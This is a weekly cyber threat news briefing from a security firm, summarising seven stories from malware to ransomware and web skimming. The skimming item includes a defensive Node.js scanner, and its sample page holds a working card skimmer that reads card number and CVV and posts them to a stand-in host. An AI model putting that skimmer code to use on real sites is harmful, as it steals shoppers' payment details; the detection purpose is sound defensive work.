5 May 2023


New covert info stealing trojan detected in the wild | Cyber Intelligence Briefing: 5 May



Top news stories this week

  1. LOBSHOT. Novel covert info stealing trojan detected in the wild.
  2. Call it off. T-Mobile suffers second data breach this year.
  3. ‘The new crypto’. Security concerns over generative AI chatbots continue.
  4. Class dismissed. Dozens of US and UK schools hit with ransomware.
  5. Watch out. Hackers exploit exposed digital video recorders to gain initial access.
  6. Game over. Law enforcement takes action against dark web markets and crypto exchanges.
  7. Stolen at checkout. Fake payment forms used to steal customers’ credit card details.


1. LOBSHOT: new covert info stealing trojan detected in the wild

Cyber criminals are using malicious adverts on search engines to distribute a new malware variant named LOBSHOT. Disguised as legitimate software, the malware evades defensive measures and gives the attacker full remote control of the infected device without the victim's knowledge. The trojan has been linked to data theft and financial fraud.

So what?

Organisations should verify the source of any new software installation, download software only from vendors' official sites rather than search-engine adverts, and use application allow-listing to block installations from unauthorised sources.





2. T-Mobile experiences second data breach of 2023

T-Mobile has confirmed a recent data breach resulted in personal and account data of several hundred customers being exposed. This marks T-Mobile's second security incident of 2023 and has put its customers at a greater risk of identity theft and phishing scams.

So what?

Security managers often use cyber security incidents to justify increased budgets. A second breach within months suggests that additional funding needs to be directed at the controls that failed the first time; otherwise the reputational damage of repeated breaches compounds.



3. Privacy and security concerns relating to ChatGPT continue

Samsung has joined the growing number of companies banning employees from using generative AI tools such as OpenAI's ChatGPT, after staff pasted sensitive internal data into the chatbot to check it for errors. The decision follows JPMorgan, Verizon, and Citigroup, which also banned the use of ChatGPT over concerns that sensitive information submitted to the tool is stored on OpenAI's servers.

Separately, Meta’s CISO Guy Rosen recently described ChatGPT as ‘the new crypto’ given the surge in scams referencing the tool. In a recent security report, Meta stated it has discovered new malware strains posing as ChatGPT browser extensions and tools.

So what?

Sharing personal or professional information with AI chatbots is a security risk: anything submitted may be retained by the provider and is outside the organisation's control. Be mindful of what information is disclosed to such platforms, and ensure the tools are only accessed through their legitimate sites, not through browser extensions or downloads found via adverts.



4. Ransomware gangs continue to target educational institutions

Ransomware attacks have recently forced dozens of schools and colleges across the US and UK to shut down their networks. Recent targets in the US included Bluefield University and Truman State University, while Hardenhuish School in Wiltshire was hit in the UK. These incidents continue a trend of ransomware groups targeting educational institutions, with at least 27 confirmed attacks on US colleges and universities in 2023 so far.

So what?

Schools with limited cyber security budgets can be prime targets for opportunistic cyber criminals. Cost effective solutions such as regular patching and multi-factor authentication can help reduce the likelihood of such incidents.



5. Hackers exploit exposed digital video recorders to gain initial access 

Hackers are currently exploiting an unpatched vulnerability in TBK DVR (digital video recorder) devices to gain initial access to corporate networks. These DVRs, which store footage from CCTV cameras, are often reachable from the internet yet sit on the internal network, so a compromised unit gives an attacker a foothold inside the perimeter.

So what?

Organisations must ensure that Internet of Things (IoT) devices such as DVRs are not directly exposed to the internet, are segmented from the main corporate network, and have their firmware and known vulnerabilities reviewed on a regular basis.



6. Law enforcement takes action against dark web markets and crypto exchanges

In a major operation coordinated by Europol and involving nine countries, 288 dark web vendors were arrested, and the illegal marketplace ‘Monopoly Market’ was seized. Law enforcement seized over EUR 50.8 million in cash and virtual currencies, 850kg of drugs, and 117 firearms.

Separately, the FBI and Ukrainian police have seized nine cryptocurrency exchange websites used to launder ransomware payments and help cyber criminals obscure the money trail. The seized infrastructure will be analysed to identify cyber criminals and may lead to future arrests.

So what?

These operations show the ongoing efforts of law enforcement agencies to combat cybercrime and the use of cryptocurrency in illicit activities.



7. Hackers display fake payment forms to obtain customers' credit card details

Hackers are using web skimming attacks to steal customers' credit card details through realistic-looking fake checkout forms injected into legitimate online stores. Once the details have been captured, the customer is shown a fake payment error and then redirected to the store's real payment page, so the transaction completes normally and nothing looks amiss.
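The pattern described above leaves fingerprints in the page itself: a checkout form or script that sends card fields to a host other than the store, followed by an error message and a redirect to the real payment URL. The following Node.js script is an added example (not S-RM's code, and not tied to any specific campaign) that scans a checkout page's HTML for those indicators. The store origin, the allow-list of trusted hosts, and the sample HTML with its injected skimmer are all constructed for illustration.

```javascript
// Added example: heuristic scan of a checkout page's HTML for the skimmer
// pattern described in the briefing. Store origin, hosts and sample page are
// constructed for illustration; a real deployment would fetch live pages.

const STORE_ORIGIN = "https://shop.example"; // assumed store origin

// Constructed sample: a legitimate checkout page into which a skimmer has
// injected a look-alike payment form and an inline exfiltration script.
const SAMPLE_HTML = `
<html><body>
<form id="pay" action="https://checkout-verify.example-cdn.net/submit" method="post">
  <input name="cc_number"><input name="cc_cvv"><input name="cc_exp">
</form>
<script src="https://shop.example/static/app.js"></script>
<script src="https://cdn.example-cdn.net/jquery.min.js"></script>
<script>
document.getElementById("pay").addEventListener("submit", function (e) {
  e.preventDefault();
  var data = { n: document.querySelector("[name=cc_number]").value,
               c: document.querySelector("[name=cc_cvv]").value };
  fetch("https://checkout-verify.example-cdn.net/c", { method: "POST", body: JSON.stringify(data) });
  alert("Payment error, please try again.");
  window.location.href = "https://shop.example/checkout/payment";
});
</script>
</body></html>`;

// Host part of an absolute URL, or null if the string is not one.
function hostOf(url) {
  try { return new URL(url).host; } catch { return null; }
}

// Scan HTML for the three indicators: forms posting off-origin, scripts loaded
// from untrusted hosts, and inline scripts that read card fields, send them to an
// untrusted host, and then show an error and redirect. Returns a list of findings.
function scanCheckoutHtml(html, storeOrigin, allowedHosts = []) {
  const trusted = new Set([hostOf(storeOrigin), ...allowedHosts]);
  const offOrigin = (url) => { const h = hostOf(url); return h !== null && !trusted.has(h); };
  const findings = [];

  // 1. Payment forms whose action points at a host other than the store.
  for (const m of html.matchAll(/<form\b[^>]*\baction=["']([^"']+)["']/gi)) {
    if (offOrigin(m[1])) findings.push({ type: "form-action-off-origin", url: m[1] });
  }

  // 2. External scripts not on the allow-list (injected skimmer loaders).
  for (const m of html.matchAll(/<script\b[^>]*\bsrc=["']([^"']+)["']/gi)) {
    if (offOrigin(m[1])) findings.push({ type: "script-src-off-origin", url: m[1] });
  }

  // 3. Inline scripts (no src) that touch card fields and reference an
  //    off-origin URL; also note the fake-error-then-redirect behaviour.
  for (const m of html.matchAll(/<script\b(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    const readsCard = /cc_|card|cvv|cvc|expir/i.test(body);
    const exfilUrls = (body.match(/https?:\/\/[^"'\s]+/g) || []).filter(offOrigin);
    const redirectAfterError =
      /alert\(|innerText|textContent/.test(body) && /location\.(href|replace|assign)/.test(body);
    if (readsCard && exfilUrls.length > 0) {
      findings.push({ type: "inline-exfil", url: exfilUrls[0], redirectAfterError });
    }
  }
  return findings;
}

console.log(JSON.stringify(scanCheckoutHtml(SAMPLE_HTML, STORE_ORIGIN), null, 2));
```

Run with `node scan.js`; the sample page yields three findings (the off-origin form action, the untrusted script source, and the inline script that reads card fields, posts them off-origin and then redirects). Passing a third-party host in `allowedHosts` suppresses findings for legitimate CDNs. The checks are heuristic and regex-based, so treat hits as leads for review rather than proof of compromise, and pair them with a Content-Security-Policy that restricts `form-action` and `connect-src` to known hosts.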

So what?

As fake payment forms become more convincing, online customers should be wary of unexpected payment errors, particularly when a retry then succeeds. Consider using single-use virtual card numbers, which are worthless to an attacker once the transaction has completed.



Cyber Intelligence Briefing

The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.

To discuss this briefing or other industry developments, please reach out to one of our experts.


Kyle Schwaeble
Senior Associate, Cyber Security

Kyle Schwaeble is a senior associate on S-RM’s cyber security team, bringing expertise in incident response management and, particularly, the secure restoration and recovery from cyber incidents such as ransomware attacks and business email compromises. In addition to his incident response work, Kyle has also supported multinational clients with their security transformation programmes, advising on the development and implementation of new technological, procedural, and cultural security controls.  

Kyle joined S-RM in 2019, initially working as an analyst in the Corporate Intelligence team, where he supported various corporate and diligence investigations. He holds a BCom(LLB) from Stellenbosch University in South Africa and is GSEC certified. 

James Tytler
Associate, Cyber Security

James Tytler is a cyber security associate in S-RM’s incident response team. In addition to responding to a wide range of cyber security incidents, he also supports clients with cyber threat intelligence services.

Before joining S-RM’s cyber security team, James worked at a London-based corporate intelligence firm, where he specialised in Middle Eastern subjects.

James has a BA in Arabic and Persian from the University of Cambridge, and an MA in International Security from Sciences Po Paris. He speaks fluent French.
